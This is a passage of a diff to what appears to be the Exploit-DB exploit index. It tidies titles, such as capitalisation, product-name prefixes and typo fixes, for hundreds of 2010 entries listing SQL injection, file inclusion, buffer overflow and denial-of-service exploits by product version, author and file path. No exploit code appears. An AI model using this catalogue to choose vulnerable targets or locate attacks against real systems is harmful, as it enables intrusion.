Injections",2010-04-14,wsn1983,jsp,webapps,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,windows,dos,0 12244,platforms/windows/remote/12244.txt,"iMesh 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow",2007-12-18,rgod,windows,remote,0 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow",2012-07-27,Metasploit,windows,local,0 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0 -12246,platforms/php/webapps/12246.txt,"joomla component com_iproperty 1.5.3 - 'id' SQL Injection",2010-04-15,v3n0m,php,webapps,0 +12246,platforms/php/webapps/12246.txt,"joomla Component com_iproperty 1.5.3 - 'id' SQL Injection",2010-04-15,v3n0m,php,webapps,0 12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0 12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 -12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - (fckeditor) Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0 -12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",hardware,dos,0 +12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0 +12252,platforms/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",hardware,dos,0 12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (Metasploit)",2010-04-16,blake,windows,local,0 12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0 -12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - 'id' SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 -12258,platforms/windows/dos/12258.py,"Windows - SMB Client-Side Bug PoC (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0 +12257,platforms/php/webapps/12257.txt,"joomla Component com_manager 1.5.3 - 'id' SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 +12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0 12259,platforms/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos,0 12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2010-04-16,JosS,php,webapps,0 12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0 @@ -11209,7 +11210,7 @@ id,file,description,date,author,platform,type,port 12269,platforms/php/webapps/12269.txt,"Joomla Component com_joltcard - SQL Injection",2010-04-16,Valentin,php,webapps,0 12270,platforms/php/webapps/12270.txt,"Joomla Component com_pandafminigames - SQL Injection",2010-04-16,Valentin,php,webapps,0 12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0 -12273,platforms/windows/dos/12273.py,"Windows 7/2008R2 SMB Client Trans2 - Stack Overflow 10-020 (PoC)",2010-04-17,"laurent gaffie",windows,dos,0 +12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)",2010-04-17,"laurent gaffie",windows,dos,0 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 12276,platforms/php/webapps/12276.txt,"redaxo CMS 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0 12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-18,"cr4wl3r ",php,webapps,0 @@ -11237,10 +11238,10 @@ id,file,description,date,author,platform,type,port 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0 12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection",2010-04-20,Ctacok,php,webapps,0 -12304,platforms/multiple/remote/12304.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,multiple,remote,0 +12304,platforms/multiple/remote/12304.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,multiple,remote,0 12305,platforms/php/webapps/12305.txt,"Joomla com_jnewspaper - 'cid' SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0 12306,platforms/php/webapps/12306.txt,"Joomla Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0 -12308,platforms/windows/remote/12308.txt,"MultiThreaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,windows,remote,0 +12308,platforms/windows/remote/12308.txt,"Multi-Threaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,windows,remote,0 12309,platforms/windows/remote/12309.txt,"Mongoose Web Server 2.8 - Multiple Directory Traversal Exploits",2010-04-20,Dr_IDE,windows,remote,0 12310,platforms/windows/remote/12310.txt,"Acritum Femitter 1.03 - Directory Traversal Exploit",2010-04-20,Dr_IDE,windows,remote,0 12312,platforms/windows/remote/12312.rb,"EasyFTP Server 1.7.0.2 - CWD Buffer Overflow (Metasploit)",2010-04-20,"Paul Makowski",windows,remote,0 @@ -11259,19 +11260,19 @@ id,file,description,date,author,platform,type,port 12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - zgtips.dll Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 12329,platforms/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent Cross-Site Scripting",2010-04-21,7Safe,asp,webapps,0 12330,platforms/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting",2010-04-21,"Lucas Apa",php,webapps,0 -12331,platforms/windows/remote/12331.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal (2)",2010-04-20,Dr_IDE,windows,remote,0 +12331,platforms/windows/remote/12331.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (2)",2010-04-20,Dr_IDE,windows,remote,0 12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 - PWD Remote Exploit",2010-04-22,zombiefx,windows,remote,0 12333,platforms/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,php,webapps,0 12334,platforms/linux/dos/12334.c,"OpenSSL - Remote Denial of Service",2010-04-22,Andi,linux,dos,0 -12336,platforms/windows/dos/12336.c,"Windows 2000/XP/2003 - win32k.sys SfnLOGONNOTIFY Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 -12337,platforms/windows/dos/12337.c,"Windows 2000/XP/2003 - win32k.sys SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 +12336,platforms/windows/dos/12336.c,"Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 +12337,platforms/windows/dos/12337.c,"Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 12338,platforms/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12339,platforms/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12340,platforms/php/webapps/12340.txt,"Joomla Component com_caddy - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0 12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0 12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - (.edd parsing) Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,windows,local,0 12343,platforms/multiple/remote/12343.txt,"Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure",2010-04-22,"Deniz Cevik",multiple,remote,0 -12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - (7D11) Model MB702LL Mobile Safari Denial-of-Service",2010-04-19,"Matthew Bergin",hardware,dos,0 +12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - (7D11) Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",hardware,dos,0 12345,platforms/php/webapps/12345.txt,"phpGreetCards 3.7 - Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0 12346,platforms/php/webapps/12346.txt,"AJ Matrix 3.1 - 'id' Multiple SQL Injection",2010-04-22,v3n0m,php,webapps,0 12349,platforms/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection",2010-04-22,v3n0m,php,webapps,0 @@ -11290,18 +11291,18 @@ id,file,description,date,author,platform,type,port 12366,platforms/php/webapps/12366.txt,"Openfoncier 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-24,"cr4wl3r ",php,webapps,0 12367,platforms/windows/remote/12367.html,"HP Digital Imaging - 'hpodio08.dll' Insecure Method Exploit",2010-04-24,"ThE g0bL!N",windows,remote,0 12368,platforms/windows/local/12368.pl,"ZipWrangler 1.20 - '.zip' SEH Exploit",2010-04-24,"TecR0c and Sud0",windows,local,0 -12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 - (basedir) Remote File Inclusion / Local File Inclusion",2010-04-24,eidelweiss,php,webapps,0 +12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 - 'baseDir' Remote File Inclusion / Local File Inclusion",2010-04-24,eidelweiss,php,webapps,0 12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - Cross-Site Scripting / Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0 12371,platforms/php/webapps/12371.txt,"WHMCS control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0 12372,platforms/php/webapps/12372.txt,"AskMe Pro 2.1 - (que_id) SQL Injection",2010-04-24,v3n0m,php,webapps,0 -12373,platforms/php/webapps/12373.txt,"Sethi Family GuestBook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 -12374,platforms/php/webapps/12374.txt,"G5 Scripts GuestBook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 -12375,platforms/osx/dos/12375.c,"Mac OSX 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 +12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 +12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 +12375,platforms/osx/dos/12375.c,"Apple Mac OS X 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload Exploit",2010-04-24,eidelweiss,php,webapps,0 12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec - Local File Inclusion",2010-04-25,R3VAN_BASTARD,php,webapps,0 12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - '.zip' Stack Buffer Overflow (PoC)",2010-04-25,mr_me,windows,local,0 12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,windows,remote,0 -12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0 +12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - 'FCKeditor' Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,multiple,dos,0 12383,platforms/php/webapps/12383.txt,"clipak - Upload Exploit",2010-04-25,indoushka,php,webapps,0 12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts - Arbitrary File Upload",2010-04-25,Sec-q8,php,webapps,0 @@ -11343,8 +11344,8 @@ id,file,description,date,author,platform,type,port 12430,platforms/php/webapps/12430.txt,"Joomla Component graphics (com_graphics) 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0 12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0 12432,platforms/php/webapps/12432.txt,"Joomla JE Property Finder Component - Upload",2010-04-28,Sid3^effects,php,webapps,0 -12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 -12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 +12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0 +12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 12436,platforms/php/webapps/12436.txt,"Pligg CMS 1.0.4 - (story.php?id) SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0 12437,platforms/windows/dos/12437.html,"Safari 4.0.3 / 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0 @@ -11355,7 +11356,7 @@ id,file,description,date,author,platform,type,port 12442,platforms/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12443,platforms/php/webapps/12443.txt,"Modelbook - 'casting_view.php' SQL Injection",2010-04-28,v3n0m,php,webapps,0 12444,platforms/php/webapps/12444.txt,"PHP Video Battle - SQL Injection",2010-04-28,v3n0m,php,webapps,0 -12445,platforms/php/webapps/12445.txt,"Articles Directory - Authenication Bypass",2010-04-29,Sid3^effects,php,webapps,0 +12445,platforms/php/webapps/12445.txt,"Articles Directory - Authentication Bypass",2010-04-29,Sid3^effects,php,webapps,0 12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0 12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup",2010-04-29,indoushka,php,webapps,0 12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload / Cross-Site Scripting",2010-04-29,Sid3^effects,php,webapps,0 @@ -11388,7 +11389,7 @@ id,file,description,date,author,platform,type,port 12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusion",2010-05-01,"cr4wl3r ",php,webapps,0 12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0 12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,asp,webapps,0 -12479,platforms/php/webapps/12479.txt,"Joomla DJ-Classifieds Extension com_djclassifieds - Upload",2010-05-02,Sid3^effects,php,webapps,0 +12479,platforms/php/webapps/12479.txt,"Joomla DJ-Classifieds Extension com_djClassifieds - Upload",2010-05-02,Sid3^effects,php,webapps,0 12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0 12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0 @@ -11403,7 +11404,7 @@ id,file,description,date,author,platform,type,port 12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 - Fork Bomb Denial of Service",2010-05-03,Dr_IDE,windows,dos,0 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos,0 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,windows,dos,0 -12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Post-Authenticated Exploit (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 +12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Post-Authentication Exploit (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 12496,platforms/php/webapps/12496.html,"KubeBlog - Cross-Site Request Forgery",2010-05-03,The.Morpheus,php,webapps,0 12497,platforms/windows/local/12497.c,"PhotoFiltre Studio X - '.tif' Local Buffer Overflow (PoC)",2010-05-04,"fl0 fl0w",windows,local,0 12498,platforms/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,windows,remote,0 @@ -11420,29 +11421,29 @@ id,file,description,date,author,platform,type,port 12512,platforms/windows/remote/12512.py,"Ziepod+ 1.0 - CrossApplication Scripting",2010-05-05,sinn3r,windows,remote,0 12514,platforms/php/webapps/12514.txt,"PHP-Nuke 5.0 - Viewslink SQL Injection",2010-05-05,CMD,php,webapps,0 12515,platforms/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution",2010-05-05,"Sn!pEr.S!Te Hacker",php,webapps,0 -12516,platforms/windows/local/12516.py,"BaoFeng Storm - .m3u File Processing Buffer Overflow",2010-05-06,"Lufeng Li and Qingshan Li",windows,local,0 -12517,platforms/php/webapps/12517.txt,"GetSimple 2.01 - Local File Inclusion",2010-05-06,Batch,php,webapps,0 +12516,platforms/windows/local/12516.py,"BaoFeng Storm - '.m3u' File Processing Buffer Overflow",2010-05-06,"Lufeng Li and Qingshan Li",windows,local,0 +12517,platforms/php/webapps/12517.txt,"Getsimple 2.01 - Local File Inclusion",2010-05-06,Batch,php,webapps,0 12518,platforms/windows/dos/12518.pl,"Microsoft Paint - Integer Overflow (Denial of Service) (MS10-005)",2010-05-06,unsign,windows,dos,0 12519,platforms/php/webapps/12519.txt,"AV Arcade - Search Field Cross-Site Scripting / HTML Injection",2010-05-06,"Vadim Toptunov",php,webapps,0 -12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server 1.3.1 - (login) Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0 +12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server 1.3.1 - 'LOGIN' Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0 12521,platforms/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,"ALTBTA ",php,webapps,0 12522,platforms/php/webapps/12522.txt,"WeBProdZ CMS - SQL Injection",2010-05-06,MasterGipy,php,webapps,0 12523,platforms/php/webapps/12523.txt,"REZERVI 3.0.2 - Remote Command Execution Exploit",2010-05-06,"JosS and eidelweiss",php,webapps,0 -12524,platforms/windows/dos/12524.py,"Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos,0 +12524,platforms/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos,0 12525,platforms/php/webapps/12525.txt,"PHP-Nuke - 'friend.php' Module SQL Injection",2010-05-07,CMD,php,webapps,0 12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) - SQL Injection",2010-05-07,Ra3cH,asp,webapps,0 12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0 12528,platforms/windows/local/12528.pl,"AVCON H323Call - Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0 -12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0 +12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0 12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0 12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0 12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script - 'offers.php' SQL Injection",2010-05-08,v3n0m,php,webapps,0 12533,platforms/php/webapps/12533.txt,"big.asp - SQL Injection",2010-05-08,Ra3cH,php,webapps,0 -12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - Url Redirection Bug",2010-05-08,ITSecTeam,php,webapps,0 +12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - URL redirection Bug",2010-05-08,ITSecTeam,php,webapps,0 12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System - SQL Injection",2010-05-08,"Easy Laster",php,webapps,0 12539,platforms/php/webapps/12539.txt,"Joomla Component com_articleman - Upload",2010-05-08,Sid3^effects,php,webapps,0 12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow (Metasploit)",2010-05-08,blake,windows,local,0 -12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Daniel Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 +12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 12543,platforms/php/webapps/12543.rb,"Alibaba Clone 3.0 (Special) - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 12544,platforms/php/webapps/12544.rb,"Alibaba Clone Diamond Version - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 @@ -11455,7 +11456,7 @@ id,file,description,date,author,platform,type,port 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal - 'login.php' Remote File Inclusion",2010-05-10,CoBRa_21,php,webapps,0 12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server - Denial of Service",2010-05-10,XroGuE,php,dos,0 12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - Denial of Service",2010-05-10,"Pouya Daneshmand",multiple,dos,0 -12556,platforms/php/webapps/12556.txt,"Tadbir CMS - (fckeditor) Arbitrary File Upload Exploit",2010-05-10,"Pouya Daneshmand",php,webapps,0 +12556,platforms/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload Exploit",2010-05-10,"Pouya Daneshmand",php,webapps,0 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 12558,platforms/php/webapps/12558.txt,"29o3 CMS - (LibDir) Multiple Remote File Inclusion",2010-05-10,eidelweiss,php,webapps,0 12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection",2010-05-10,cyberlog,php,webapps,0 @@ -11471,7 +11472,7 @@ id,file,description,date,author,platform,type,port 12570,platforms/php/webapps/12570.txt,"Uploader 0.1.5 - Multiple Vulnerabilities",2010-05-11,indoushka,php,webapps,0 12571,platforms/asp/webapps/12571.txt,"e-webtech - 'page.asp' SQL Injection",2010-05-11,CoBRa_21,asp,webapps,0 12572,platforms/php/webapps/12572.txt,"Free Advertisment CMS - 'user_info.php' SQL Injection",2010-05-11,XroGuE,php,webapps,0 -12573,platforms/windows/remote/12573.html,"Apple Safari 4.0.5 - parent.close() (memory corruption) Code Execution Exploit",2010-05-11,"Krystian Kloskowski",windows,remote,0 +12573,platforms/windows/remote/12573.html,"Apple Safari 4.0.5 - parent.close() (memory Corruption) Code Execution",2010-05-11,"Krystian Kloskowski",windows,remote,0 12574,platforms/php/webapps/12574.txt,"Joomla Module Camp26 Visitor Data 1.1 - Remote code Execution",2010-05-11,"Chip d3 bi0s",php,webapps,0 12575,platforms/php/webapps/12575.txt,"Marinet CMS - SQL Injection",2010-05-11,XroGuE,php,webapps,0 12576,platforms/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,php,webapps,0 @@ -11482,14 +11483,14 @@ id,file,description,date,author,platform,type,port 12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0 12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 12583,platforms/php/webapps/12583.txt,"e-webtech - 'fixed_page.asp' SQL Injection",2010-05-12,FL0RiX,php,webapps,0 -12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps,0 +12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - 'FCKeditor' Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps,0 12585,platforms/php/webapps/12585.txt,"4Images 1.7.7 - (image_utils.php) Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection",2010-05-13,Cryptovirus,php,webapps,0 12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities",2010-05-13,"fl0 fl0w",linux,remote,21 12588,platforms/linux/dos/12588.txt,"Samba - Multiple Denial of Service Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0 12590,platforms/php/webapps/12590.txt,"Joomla Component com_konsultasi - 'sid' SQL Injection",2010-05-13,c4uR,php,webapps,0 12591,platforms/php/webapps/12591.txt,"BlaB! Lite 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0 -12592,platforms/php/webapps/12592.txt,"Joomla Component advertising (com_aardvertiser) 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0 +12592,platforms/php/webapps/12592.txt,"Joomla Component Advertising (com_aardvertiser) 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0 12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox - Cross-Site Scripting",2010-05-13,"Valentin Hoebel",php,webapps,0 12594,platforms/php/webapps/12594.txt,"Joomla Component Seber Cart - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0 12595,platforms/php/webapps/12595.txt,"Joomla Component FDione Form Wizard - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0 @@ -11520,7 +11521,7 @@ id,file,description,date,author,platform,type,port 12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - '.zip' Stack Buffer Overflow (PoC)",2010-05-16,sud0,windows,local,0 12623,platforms/php/webapps/12623.txt,"Joomla Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0 12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 -12628,platforms/php/webapps/12628.txt,"EgO 0.7b - (fckeditor) Remote File Upload",2010-05-16,ITSecTeam,php,webapps,0 +12628,platforms/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Remote File Upload",2010-05-16,ITSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0 12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-17,CoBRa_21,php,webapps,0 @@ -11564,7 +11565,7 @@ id,file,description,date,author,platform,type,port 12674,platforms/php/webapps/12674.txt,"webYourPhotos 6.05 - 